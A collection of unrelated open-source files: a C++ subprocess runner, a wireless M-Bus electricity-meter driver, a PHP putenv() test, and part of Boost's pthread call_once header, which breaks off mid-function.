        tie(task_.stdOutFd, childFds.stdOut) = CreateStdPipe(false);
    }
    if (stdErrSink) {
        stdErrSink_ = stdErrSink;
        tie(task_.stdErrFd, childFds.stdErr) = CreateStdPipe(false);
    }

    /* Lock and flush stdio around fork() so the child does not inherit
       half-written buffers nor a locked stream. */
    ::flockfile(stdout);
    ::flockfile(stderr);
    ::fflush_unlocked(NULL);
    task_.wrapperPid = fork();
    int savedErrno = errno;  // errno from fork(), before stdio calls clobber it
    ::funlockfile(stderr);
    ::funlockfile(stdout);
    if (task_.wrapperPid == -1) {
        throw ML::Exception(savedErrno, "Runner::run fork");
    }
    else if (task_.wrapperPid == 0) {
        /* Child: exec the helper; on failure, report through the status
           pipe and exit without running any parent-side cleanup. */
        try {
            task_.runWrapper(command, childFds);
        }
        catch (...) {
            ProcessStatus status;
            status.state = ProcessState::STOPPED;
            status.setErrorCodes(errno, LaunchError::SUBTASK_LAUNCH);

            childFds.writeStatus(status);

            exit(-1);
        }
    }
    else {
        /* Parent: register the status and output fds with the epoll loop. */
        task_.statusState = ProcessState::LAUNCHING;

        ML::set_file_flag(task_.statusFd, O_NONBLOCK);
        auto statusCb = [&] (const epoll_event & event) {
            handleChildStatus(event);
        };
        addFd(task_.statusFd, true, false, statusCb);
        if (stdOutSink) {
            ML::set_file_flag(task_.stdOutFd, O_NONBLOCK);
            auto outputCb = [=] (const epoll_event & event) {
                handleOutputStatus(event, task_.stdOutFd, stdOutSink_);
            };
            addFd(task_.stdOutFd, true, false, outputCb);
        }
        if (stdErrSink) {
            ML::set_file_flag(task_.stdErrFd, O_NONBLOCK);
            auto outputCb = [=] (const epoll_event & event) {
                handleOutputStatus(event, task_.stdErrFd, stdErrSink_);
            };
            addFd(task_.stdErrFd, true, false, outputCb);
        }

        /* Close the child-side ends in the parent. */
        childFds.close();
    }
}
/* Sends "signum" to the child's whole process group and then blocks until
   the Runner reports termination.  Returns false -- or throws when
   "mustSucceed" is set -- if no subprocess is currently available. */
bool
Runner::
kill(int signum, bool mustSucceed) const
{
    if (childPid_ <= 0) {
        if (!mustSucceed) {
            return false;
        }
        throw ML::Exception("subprocess not available");
    }

    /* Negative pid targets the process group rooted at the child. */
    ::kill(-childPid_, signum);
    waitTermination();

    return true;
}
/* Delivers "signum" to the child process only (not its group) and returns
   immediately, without waiting for termination.  Returns false -- or
   throws when "mustSucceed" is set -- if no subprocess is available. */
bool
Runner::
signal(int signum, bool mustSucceed)
{
    if (childPid_ <= 0) {
        if (!mustSucceed) {
            return false;
        }
        throw ML::Exception("subprocess not available");
    }

    ::kill(childPid_, signum);

    return true;
}
/* Waits until the run request issued via run()/runSync() has been picked up
   by the MessageLoop thread (activeRequest_ catches up with runRequests_),
   or until "secondsToWait" has elapsed.  Returns false on timeout. */
bool
Runner::
waitRunning(double secondsToWait) const
{
    bool timeout(false);

    Date deadline = Date::now().plusSeconds(secondsToWait);
    while (true) {
        /* Snapshot the counter; futex_wait below only sleeps if it still
           holds this value, so wake-ups are never missed. */
        int currentActive(activeRequest_);
        if (currentActive >= runRequests_) {
            break;
        }
        double timeToWait = Date::now().secondsUntil(deadline);
        if (isfinite(timeToWait)) {
            if (timeToWait < 0) {
                timeout = true;
                break;
            }
            ML::futex_wait(activeRequest_, currentActive, timeToWait);
        }
        else {
            /* Infinite deadline: wait without a timeout. */
            ML::futex_wait(activeRequest_, currentActive);
        }
    }

    return !timeout;
}
/* Waits up to "secondsToWait" for the child process to have been assigned a
   pid.  Returns true if the child is effectively started. */
bool
Runner::
waitStart(double secondsToWait) const
{
    Date deadline = Date::now().plusSeconds(secondsToWait);

    /* childPid_ stays at -1 until the pid is reported by the wrapper;
       futex_wait may return spuriously, hence the loop. */
    while (childPid_ == -1) {
        double timeToWait = Date::now().secondsUntil(deadline);
        if (timeToWait < 0)
            break;
        if (isfinite(timeToWait))
            ML::futex_wait(childPid_, -1, timeToWait);
        else ML::futex_wait(childPid_, -1);
    }

    /* NOTE(review): "> 0" rather than "!= -1" suggests other negative values
       encode launch failures -- confirm against handleChildStatus. */
    return childPid_ > 0;
}
/* Blocks until the current (or last) run has fully terminated; returns
   immediately if nothing is running. */
void
Runner::
waitTermination() const
{
    /* "running_" is cleared by the MessageLoop thread once the child has
       been reaped; futex_wait avoids busy-spinning on it. */
    while (running_) {
        ML::futex_wait(running_, true);
    }
}
double
Runner::
duration()
const
{
Date end = Date::now();
if (!running_) {
end = endDate_;
}
return (end - startDate_);
}
/* RUNNER::TASK */

/* All file descriptors start out invalid (-1); they are filled in by
   getStdInSink()/doRunImpl() and reset by postTerminate(). */
Runner::Task::
Task()
    : wrapperPid(-1),
      stdInFd(-1),
      stdOutFd(-1),
      stdErrFd(-1),
      statusFd(-1),
      statusState(ProcessState::UNKNOWN)
{}
/* Executed in the freshly forked child: builds the argv for the
   "runner_helper" program and execs it.  Never returns on success.

   argv layout: [preArgs...] helper channels command... NULL, i.e. exactly
   preArgs.size() + 3 + command.size() slots, which is the array size below. */
void
Runner::Task::
runWrapper(const vector<string> & command, ProcessFds & fds)
{
    // Find runner_helper path
    string runnerHelper = findRunnerHelper();
    vector<string> preArgs = { /*"gdb", "--tty", "/dev/pts/48", "--args"*/ /*"../strace-code/strace", "-b", "execve", "-ftttT", "-o", "runner_helper.strace"*/ };

    // Set up the arguments before we fork, as we don't want to call malloc()
    // from the fork, and it can be called from c_str() in theory.
    auto len = command.size();

    char * argv[len + 3 + preArgs.size()];

    for (unsigned i = 0; i < preArgs.size(); ++i)
        argv[i] = (char *)preArgs[i].c_str();

    size_t idx = preArgs.size();
    argv[idx++] = (char *) runnerHelper.c_str();

    // Encoded fd numbers handed to the helper as its first real argument.
    size_t channelsSize = 4*2*4+3+1;
    char channels[channelsSize];
    fds.encodeToBuffer(channels, channelsSize);
    argv[idx++] = channels;

    // Use size_t to match "len" (command.size()); the previous "int i"
    // triggered a signed/unsigned comparison.
    for (size_t i = 0; i < len; i++) {
        argv[idx++] = (char *) command[i].c_str();
    }
    argv[idx++] = nullptr;

    // Pass our environment through unchanged.
    std::vector<char *> env;
    char * const * p = environ;

    while (*p) {
        env.push_back(*p);
        ++p;
    }
    env.push_back(nullptr);
    char * const * envp = &env[0];

    int res = execve(argv[0], argv, envp);
    if (res == -1) {
        throw ML::Exception(errno, "launching runner helper");
    }

    // execve only returns on failure, so this line is unreachable.
    throw ML::Exception("You are the King of Time!");
}
/* Resolves the path of the "runner_helper" binary: an explicitly configured
   Runner::runnerHelper wins; otherwise the path is deduced once from $BIN
   or from the current working directory plus the compile-time BIN macro,
   and cached in a function-local static. */
string
Runner::Task::
findRunnerHelper()
{
    string runnerHelper = Runner::runnerHelper;

    if (runnerHelper.empty()) {
        static string staticHelper;

        if (staticHelper.empty()) {
            string binDir;
            char * cBin = ::getenv("BIN");
            if (cBin) {
                binDir = cBin;
            }
            if (binDir.empty()) {
                char binBuffer[16384];
                char * res = ::getcwd(binBuffer, 16384);
                ExcAssert(res != NULL);
                binDir = res;
                binDir += "/" BIN;  // BIN is a preprocessor string constant
            }
            staticHelper = binDir + "/runner_helper";

            // Make sure the deduced path is right
            struct stat sb;
            int res = ::stat(staticHelper.c_str(), &sb);
            if (res != 0) {
                throw ML::Exception(errno, "checking static helper");
            }
        }
        runnerHelper = staticHelper;
    }

    return runnerHelper;
}
/* This method *must* be called from attemptTaskTermination, in order to
 * respect the natural order of things. */
/* Reaps the wrapper process, unregisters and closes all remaining fds, and
   resets the task to a reusable state. */
void
Runner::Task::
postTerminate(Runner & runner)
{
    if (wrapperPid <= 0) {
        throw ML::Exception("wrapperPid <= 0, has postTerminate been executed before?");
    }

    /* Retry waitpid on EINTR; any other outcome than reaping our wrapper
       is a hard error. */
    int wrapperPidStatus;
    while (true) {
        int res = ::waitpid(wrapperPid, &wrapperPidStatus, 0);
        if (res == wrapperPid) {
            break;
        }
        else if (res == -1) {
            if (errno != EINTR) {
                throw ML::Exception(errno, "waitpid");
            }
        }
        else {
            throw ML::Exception("waitpid has not returned the wrappedPid");
        }
    }
    wrapperPid = -1;

    if (stdInFd != -1) {
        runner.removeFd(stdInFd, true);
        ::close(stdInFd);
        stdInFd = -1;
    }

    /* Output fds may already have been unregistered on EOF, so removeFd
       failures are deliberately swallowed here. */
    auto unregisterFd = [&] (int & fd) {
        if (fd > -1) {
            JML_TRACE_EXCEPTIONS(false);
            try {
                runner.removeFd(fd, true);
            }
            catch (const ML::Exception & exc) {
            }
            ::close(fd);
            fd = -1;
        }
    };
    unregisterFd(stdOutFd);
    unregisterFd(stdErrFd);

    /* Reset remaining state for a potential next run. */
    command.clear();
    runResult = RunResult();
    onTerminate = nullptr;
    statusState = ProcessState::UNKNOWN;
}
/* RUNRESULT */

/* Initializes to an "unknown" result; rusage is zeroed since it only
   becomes meaningful once the child has been reaped. */
RunResult::
RunResult()
    : state(UNKNOWN), signum(-1), returnCode(-1), launchErrno(0)
{
    ::memset(&usage, 0, sizeof(usage));
}
/* Fills state/returnCode/signum from a waitpid() status word.  Statuses
   that indicate neither a normal exit nor a signal leave the result
   unchanged. */
void
RunResult::
updateFromStatus(int status)
{
    if (WIFEXITED(status)) {
        state = RETURNED;
        returnCode = WEXITSTATUS(status);
        return;
    }
    if (WIFSIGNALED(status)) {
        state = SIGNALED;
        signum = WTERMSIG(status);
    }
}
int
RunResult::
processStatus()
const
{
int status;
if (state == RETURNED)
status = returnCode;
else if (state == SIGNALED)
status = 128 + signum;
else if (state == LAUNCH_ERROR) {
if (launchErrno == EPERM) {
status = 126;
}
else if (launchErrno == ENOENT) {
status = 127;
}
else {
status = 1;
}
}
else
throw ML::Exception("unhandled state");
return status;
}
/* Records an exception thrown while launching; runSync() rethrows it in the
   caller's thread via std::rethrow_exception. */
void
RunResult::
updateFromLaunchException(const std::exception_ptr & excPtr)
{
    state = LAUNCH_EXCEPTION;
    launchExc = excPtr;
}
/* Records a launch error (errno + optional message).  The final message is
   the supplied text, the strerror() text, or both joined with ": ". */
void
RunResult::
updateFromLaunchError(int launchErrno,
                      const std::string & launchError)
{
    this->state = LAUNCH_ERROR;
    this->launchErrno = launchErrno;

    std::string message = launchError;
    if (message.empty()) {
        message = strerror(launchErrno);
    }
    else if (launchErrno) {
        message += std::string(": ") + strerror(launchErrno);
    }
    this->launchError = message;
}
/* Human-readable name for a RunResult::State; out-of-range values are
   rendered numerically instead of invoking undefined behaviour. */
std::string
to_string(const RunResult::State & state)
{
    switch (state) {
    case RunResult::UNKNOWN: return "UNKNOWN";
    case RunResult::LAUNCH_EXCEPTION: return "LAUNCH_EXCEPTION";
    case RunResult::LAUNCH_ERROR: return "LAUNCH_ERROR";
    case RunResult::RETURNED: return "RETURNED";
    case RunResult::SIGNALED: return "SIGNALED";
    case RunResult::PARENT_EXITED: return "PARENT_EXITED";
    }

    return ML::format("RunResult::State(%d)", state);
}
/* Stream output for RunResult::State, delegating to to_string above. */
std::ostream &
operator << (std::ostream & stream, const RunResult::State & state)
{
    return stream << to_string(state);
}
/* Value-description (serialization metadata) for RunResult fields. */
RunResultDescription::
RunResultDescription()
{
    addField("state", &RunResult::state, "State of run command");
    addField("signum", &RunResult::signum,
             "Signal number that it exited with", -1);
    addField("returnCode", &RunResult::returnCode,
             "Return code of command", -1);
    addField("launchErrno", &RunResult::launchErrno,
             "Errno for launch error", 0);
    addField("launchError", &RunResult::launchError,
             "Error message for launch error");
    addField("usage", &RunResult::usage,
             "Process statistics as returned by getrusage()");
}
/* Enum-description for RunResult::State.  Registers every enumerator,
   including LAUNCH_EXCEPTION which was previously missing here even though
   the enum defines it (see to_string above). */
RunResultStateDescription::
RunResultStateDescription()
{
    addValue("UNKNOWN", RunResult::UNKNOWN,
             "State is unknown or uninitialized");
    addValue("LAUNCH_EXCEPTION", RunResult::LAUNCH_EXCEPTION,
             "An exception occurred while launching the command");
    addValue("LAUNCH_ERROR", RunResult::LAUNCH_ERROR,
             "Command was unable to be launched");
    addValue("RETURNED", RunResult::RETURNED, "Command returned");
    addValue("SIGNALED", RunResult::SIGNALED, "Command exited with a signal");
    addValue("PARENT_EXITED", RunResult::PARENT_EXITED, "Parent process exited forcing child to die");
}
/* EXECUTE */

/* Deprecated overload kept for backward compatibility: the MessageLoop
   argument is ignored and the call is forwarded to the loop-less variant.
   A deprecation warning is printed once per process. */
RunResult
execute(MessageLoop & loop,
        const vector<string> & command,
        const shared_ptr<InputSink> & stdOutSink,
        const shared_ptr<InputSink> & stdErrSink,
        const string & stdInData,
        bool closeStdin)
{
    static bool warningPrinted(false);

    if (!warningPrinted) {
        cerr << "warning: the \"MessageLoop\"-based \"execute\" function is deprecated\n";
        warningPrinted = true;
    }

    return execute(command, stdOutSink, stdErrSink, stdInData, closeStdin);
}
/* Runs "command" synchronously using a dedicated, throw-away Runner and
   returns its result once the subprocess has terminated. */
RunResult
execute(const vector<string> & command,
        const shared_ptr<InputSink> & stdOutSink,
        const shared_ptr<InputSink> & stdErrSink,
        const string & stdInData,
        bool closeStdin)
{
    Runner oneShotRunner;
    oneShotRunner.closeStdin = closeStdin;

    return oneShotRunner.runSync(command, stdOutSink, stdErrSink, stdInData);
}
} // namespace Datacratic
| {
"pile_set_name": "Github"
} |
/*
Copyright (C) 2020 Fredrik Öhrström
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include"dvparser.h"
#include"meters.h"
#include"meters_common_implementation.h"
#include"wmbus.h"
#include"wmbus_utils.h"
#include"util.h"
/* Driver for the EHZ-P electricity meter: decodes total/returned energy,
   current power and device on-time from wmbus T1 telegrams. */
struct MeterEHZP : public virtual ElectricityMeter, public virtual MeterCommonImplementation
{
    MeterEHZP(WMBus *bus, MeterInfo &mi);

    double totalEnergyConsumption(Unit u);
    double currentPowerConsumption(Unit u);
    double totalEnergyProduction(Unit u);
    double currentPowerProduction(Unit u);

private:

    void processContent(Telegram *t);

    // Last decoded values, stored in the units implied by the suffixes
    // (kWh, kW, hours); filled in by processContent().
    double total_energy_kwh_ {};
    double current_power_kw_ {};
    double total_energy_returned_kwh_ {};
    double current_power_returned_kw_ {};
    double on_time_h_ {};
};
/* Registers link mode, security mode and the printable fields exposed for
   this meter type. */
MeterEHZP::MeterEHZP(WMBus *bus, MeterInfo &mi) :
    MeterCommonImplementation(bus, mi, MeterType::EHZP)
{
    // Telegrams are AES-CBC encrypted without IV; the meter transmits in T1.
    setExpectedTPLSecurityMode(TPLSecurityMode::AES_CBC_NO_IV);
    addLinkMode(LinkMode::T1);

    addPrint("total_energy_consumption", Quantity::Energy,
             [&](Unit u){ return totalEnergyConsumption(u); },
             "The total energy consumption recorded by this meter.",
             true, true);

    addPrint("current_power_consumption", Quantity::Power,
             [&](Unit u){ return currentPowerConsumption(u); },
             "Current power consumption.",
             true, true);

    addPrint("total_energy_production", Quantity::Energy,
             [&](Unit u){ return totalEnergyProduction(u); },
             "The total energy production recorded by this meter.",
             true, true);

    addPrint("on_time", Quantity::Time,
             [&](Unit u){ assertQuantity(u, Quantity::Time);
                          return convert(on_time_h_, Unit::Hour, u); },
             "Device on time.",
             false, true);
    // NOTE(review): currentPowerProduction() exists but has no addPrint
    // entry here -- confirm whether that field is intentionally not exposed.
}
/* Factory returning an EHZP driver behind its abstract meter interface. */
unique_ptr<ElectricityMeter> createEHZP(WMBus *bus, MeterInfo &mi)
{
    return unique_ptr<ElectricityMeter>(new MeterEHZP(bus, mi));
}
/* Unit-converting accessors for the last decoded values. */
double MeterEHZP::totalEnergyConsumption(Unit u)
{
    assertQuantity(u, Quantity::Energy);
    return convert(total_energy_kwh_, Unit::KWH, u);
}

double MeterEHZP::currentPowerConsumption(Unit u)
{
    assertQuantity(u, Quantity::Power);
    return convert(current_power_kw_, Unit::KW, u);
}

double MeterEHZP::totalEnergyProduction(Unit u)
{
    assertQuantity(u, Quantity::Energy);
    return convert(total_energy_returned_kwh_, Unit::KWH, u);
}

double MeterEHZP::currentPowerProduction(Unit u)
{
    assertQuantity(u, Quantity::Power);
    return convert(current_power_returned_kw_, Unit::KW, u);
}
/* Decodes the relevant data-value records of a telegram into the meter
   fields.  The annotated dump below shows the expected records.
   Fix: "&current_power_kw_" had been corrupted into the mojibake
   "¤t_power_kw_" (U+00A4 for "&curren"), which does not compile. */
void MeterEHZP::processContent(Telegram *t)
{
    /*
      (ehzp) 26: 07 dif (64 Bit Integer/Binary Instantaneous value)
      (ehzp) 27: 00 vif (Energy mWh)
      (ehzp) 28: * 583B740200000000 total energy (41.171800 kwh)
      (ehzp) 30: 07 dif (64 Bit Integer/Binary Instantaneous value)
      (ehzp) 31: 80 vif (Energy mWh)
      (ehzp) 32: 3C vife (backward flow)
      (ehzp) 33: * BCD7020000000000 total energy returned (0.186300 kwh)
      (ehzp) 3b: 07 dif (64 Bit Integer/Binary Instantaneous value)
      (ehzp) 3c: 28 vif (Power mW)
      (ehzp) 3d: * B070200000000000 current power (2.126000 kw)
      (ehzp) 45: 04 dif (32 Bit Integer/Binary Instantaneous value)
      (ehzp) 46: 20 vif (On time seconds)
      (ehzp) 47: * 92A40600 on time (120.929444 h)
    */
    int offset;
    string key;

    if (findKey(MeasurementType::Unknown, ValueInformation::EnergyWh, 0, 0, &key, &t->values))
    {
        extractDVdouble(&t->values, key, &offset, &total_energy_kwh_);
        t->addMoreExplanation(offset, " total energy (%f kwh)", total_energy_kwh_);
    }
    if (findKey(MeasurementType::Unknown, ValueInformation::PowerW, 0, 0, &key, &t->values))
    {
        extractDVdouble(&t->values, key, &offset, &current_power_kw_);
        t->addMoreExplanation(offset, " current power (%f kw)", current_power_kw_);
    }

    // "07803C" = dif 07 / vif 80 / vife 3C (backward flow), per the dump above.
    extractDVdouble(&t->values, "07803C", &offset, &total_energy_returned_kwh_);
    t->addMoreExplanation(offset, " total energy returned (%f kwh)", total_energy_returned_kwh_);

    // "0420" = dif 04 / vif 20 (on-time seconds), per the dump above.
    extractDVdouble(&t->values, "0420", &offset, &on_time_h_);
    t->addMoreExplanation(offset, " on time (%f h)", on_time_h_);
}
| {
"pile_set_name": "Github"
} |
--TEST--
putenv() basic tests
--FILE--
<?php
// Use a name that should never be present, so the initial getenv() is
// expected to return false.
$var_name="SUCHVARSHOULDNOTEXIST";
var_dump(getenv($var_name));
// "NAME=value" sets the variable.
var_dump(putenv($var_name."=value"));
var_dump(getenv($var_name));
// "NAME=" sets it to an empty string.
var_dump(putenv($var_name."="));
var_dump(getenv($var_name));
// "NAME" alone removes the variable again.
var_dump(putenv($var_name));
var_dump(getenv($var_name));
echo "Done\n";
?>
--EXPECTF--
bool(false)
bool(true)
string(5) "value"
bool(true)
string(0) ""
bool(true)
bool(false)
Done
#ifndef BOOST_THREAD_PTHREAD_ONCE_HPP
#define BOOST_THREAD_PTHREAD_ONCE_HPP
// once.hpp
//
// (C) Copyright 2007-8 Anthony Williams
// (C) Copyright 2011-2012 Vicente J. Botet Escriba
//
// Distributed under the Boost Software License, Version 1.0. (See
// accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
#include <boost/thread/detail/config.hpp>
#include <boost/thread/detail/move.hpp>
#include <boost/thread/detail/invoke.hpp>
#include <boost/thread/pthread/pthread_helpers.hpp>
#include <boost/thread/pthread/pthread_mutex_scoped_lock.hpp>
#include <boost/thread/detail/delete.hpp>
#include <boost/core/no_exceptions_support.hpp>
#include <boost/bind.hpp>
#include <boost/assert.hpp>
#include <boost/config/abi_prefix.hpp>
#include <boost/cstdint.hpp>
#include <pthread.h>
#include <csignal>
namespace boost
{
    struct once_flag;

// Initial value of once_flag::epoch: "never run".
#define BOOST_ONCE_INITIAL_FLAG_VALUE 0

    namespace thread_detail
    {
        // Atomic-enough counter type used for the epoch protocol below.
        typedef boost::uint32_t uintmax_atomic_t;
        #define BOOST_THREAD_DETAIL_UINTMAX_ATOMIC_C2(value) value##u
        #define BOOST_THREAD_DETAIL_UINTMAX_ATOMIC_MAX_C BOOST_THREAD_DETAIL_UINTMAX_ATOMIC_C2(~0)
    }

#ifdef BOOST_THREAD_PROVIDES_ONCE_CXX11
// C++11-conforming once_flag: non-copyable, constexpr-constructible, with
// a private epoch only accessible to the call_once friends.
#if !defined(BOOST_NO_CXX11_VARIADIC_TEMPLATES) && !defined(BOOST_NO_CXX11_RVALUE_REFERENCES)
    template<typename Function, class ...ArgTypes>
    inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(ArgTypes)... args);
#else
    template<typename Function>
    inline void call_once(once_flag& flag, Function f);
    template<typename Function, typename T1>
    inline void call_once(once_flag& flag, Function f, T1 p1);
    template<typename Function, typename T1, typename T2>
    inline void call_once(once_flag& flag, Function f, T1 p1, T2 p2);
    template<typename Function, typename T1, typename T2, typename T3>
    inline void call_once(once_flag& flag, Function f, T1 p1, T2 p2, T3 p3);
#endif

    struct once_flag
    {
        BOOST_THREAD_NO_COPYABLE(once_flag)
        BOOST_CONSTEXPR once_flag() BOOST_NOEXCEPT
          : epoch(BOOST_ONCE_INITIAL_FLAG_VALUE)
        {}
    private:
        volatile thread_detail::uintmax_atomic_t epoch;

#if !defined(BOOST_NO_CXX11_VARIADIC_TEMPLATES) && !defined(BOOST_NO_CXX11_RVALUE_REFERENCES)
        template<typename Function, class ...ArgTypes>
        friend void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(ArgTypes)... args);
#else
        template<typename Function>
        friend void call_once(once_flag& flag, Function f);
        template<typename Function, typename T1>
        friend void call_once(once_flag& flag, Function f, T1 p1);
        template<typename Function, typename T1, typename T2>
        friend void call_once(once_flag& flag, Function f, T1 p1, T2 p2);
        template<typename Function, typename T1, typename T2, typename T3>
        friend void call_once(once_flag& flag, Function f, T1 p1, T2 p2, T3 p3);
#endif
    };

#define BOOST_ONCE_INIT once_flag()

#else // BOOST_THREAD_PROVIDES_ONCE_CXX11

    // Legacy aggregate once_flag, statically initializable with BOOST_ONCE_INIT.
    struct once_flag
    {
        volatile thread_detail::uintmax_atomic_t epoch;
    };

#define BOOST_ONCE_INIT {BOOST_ONCE_INITIAL_FLAG_VALUE}
#endif // BOOST_THREAD_PROVIDES_ONCE_CXX11

// Invocation shim: prefer detail::invoke when available, else boost::bind
// (the bind result needs an extra "()", hence ..._CALL).
#if defined BOOST_THREAD_PROVIDES_INVOKE
#define BOOST_THREAD_INVOKE_RET_VOID detail::invoke
#define BOOST_THREAD_INVOKE_RET_VOID_CALL
#elif defined BOOST_THREAD_PROVIDES_INVOKE_RET
#define BOOST_THREAD_INVOKE_RET_VOID detail::invoke<void>
#define BOOST_THREAD_INVOKE_RET_VOID_CALL
#else
#define BOOST_THREAD_INVOKE_RET_VOID boost::bind
#define BOOST_THREAD_INVOKE_RET_VOID_CALL ()
#endif

    namespace thread_detail
    {
        // Shared protocol state: a per-thread epoch cache, a global epoch
        // counter that only decreases, and the mutex/condvar protecting
        // transitions of once_flag::epoch.
        BOOST_THREAD_DECL uintmax_atomic_t& get_once_per_thread_epoch();
        BOOST_THREAD_DECL extern uintmax_atomic_t once_global_epoch;
        BOOST_THREAD_DECL extern pthread_mutex_t once_epoch_mutex;
        BOOST_THREAD_DECL extern pthread_cond_t once_epoch_cv;
    }

    // Based on Mike Burrows fast_pthread_once algorithm as described in
    // http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2444.html
#if !defined(BOOST_NO_CXX11_VARIADIC_TEMPLATES) && !defined(BOOST_NO_CXX11_RVALUE_REFERENCES)
    /* call_once, variadic form.  Epoch protocol: flag.epoch is 0 ("never
       run"), 1 ("being initialized"), or a value copied from the
       decreasing global epoch once initialization succeeded.  A thread
       whose cached per-thread epoch is <= flag.epoch has already observed
       this flag as done and takes the fast path without locking. */
    template<typename Function, class ...ArgTypes>
    inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(ArgTypes)... args)
    {
        static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
        static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
        thread_detail::uintmax_atomic_t const epoch=flag.epoch;
        thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();

        if(epoch<this_thread_epoch)
        {
            pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);

            while(flag.epoch<=being_initialized)
            {
                if(flag.epoch==uninitialized_flag)
                {
                    flag.epoch=being_initialized;
                    BOOST_TRY
                    {
                        // Run the user callable with the mutex released so
                        // other flags are not blocked; re-locked on scope exit.
                        pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
                        BOOST_THREAD_INVOKE_RET_VOID(
                            thread_detail::decay_copy(boost::forward<Function>(f)),
                            thread_detail::decay_copy(boost::forward<ArgTypes>(args))...
                        ) BOOST_THREAD_INVOKE_RET_VOID_CALL;
                    }
                    BOOST_CATCH (...)
                    {
                        // Roll back so another thread can retry, wake waiters.
                        flag.epoch=uninitialized_flag;
                        BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                        BOOST_RETHROW
                    }
                    BOOST_CATCH_END
                    // Success: stamp the flag with a fresh global epoch.
                    flag.epoch=--thread_detail::once_global_epoch;
                    BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                }
                else
                {
                    // Another thread is initializing: wait for it to finish.
                    while(flag.epoch==being_initialized)
                    {
                        BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
                    }
                }
            }
            this_thread_epoch=thread_detail::once_global_epoch;
        }
    }
#else
    /* Non-variadic call_once overloads (compilers without variadic
       templates / rvalue references), taking the callable and arguments by
       copy.  All follow the same epoch protocol documented on the variadic
       overload above. */
    template<typename Function>
    inline void call_once(once_flag& flag, Function f)
    {
        static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
        static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
        thread_detail::uintmax_atomic_t const epoch=flag.epoch;
        thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();

        if(epoch<this_thread_epoch)
        {
            pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);

            while(flag.epoch<=being_initialized)
            {
                if(flag.epoch==uninitialized_flag)
                {
                    flag.epoch=being_initialized;
                    BOOST_TRY
                    {
                        // Callable runs with the mutex temporarily released.
                        pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
                        f();
                    }
                    BOOST_CATCH (...)
                    {
                        flag.epoch=uninitialized_flag;
                        BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                        BOOST_RETHROW
                    }
                    BOOST_CATCH_END
                    flag.epoch=--thread_detail::once_global_epoch;
                    BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                }
                else
                {
                    while(flag.epoch==being_initialized)
                    {
                        BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
                    }
                }
            }
            this_thread_epoch=thread_detail::once_global_epoch;
        }
    }

    // One-argument overload; same protocol.
    template<typename Function, typename T1>
    inline void call_once(once_flag& flag, Function f, T1 p1)
    {
        static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
        static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
        thread_detail::uintmax_atomic_t const epoch=flag.epoch;
        thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();

        if(epoch<this_thread_epoch)
        {
            pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);

            while(flag.epoch<=being_initialized)
            {
                if(flag.epoch==uninitialized_flag)
                {
                    flag.epoch=being_initialized;
                    BOOST_TRY
                    {
                        pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
                        BOOST_THREAD_INVOKE_RET_VOID(f,p1) BOOST_THREAD_INVOKE_RET_VOID_CALL;
                    }
                    BOOST_CATCH (...)
                    {
                        flag.epoch=uninitialized_flag;
                        BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                        BOOST_RETHROW
                    }
                    BOOST_CATCH_END
                    flag.epoch=--thread_detail::once_global_epoch;
                    BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                }
                else
                {
                    while(flag.epoch==being_initialized)
                    {
                        BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
                    }
                }
            }
            this_thread_epoch=thread_detail::once_global_epoch;
        }
    }

    // Two-argument overload; same protocol.
    template<typename Function, typename T1, typename T2>
    inline void call_once(once_flag& flag, Function f, T1 p1, T2 p2)
    {
        static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
        static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
        thread_detail::uintmax_atomic_t const epoch=flag.epoch;
        thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();

        if(epoch<this_thread_epoch)
        {
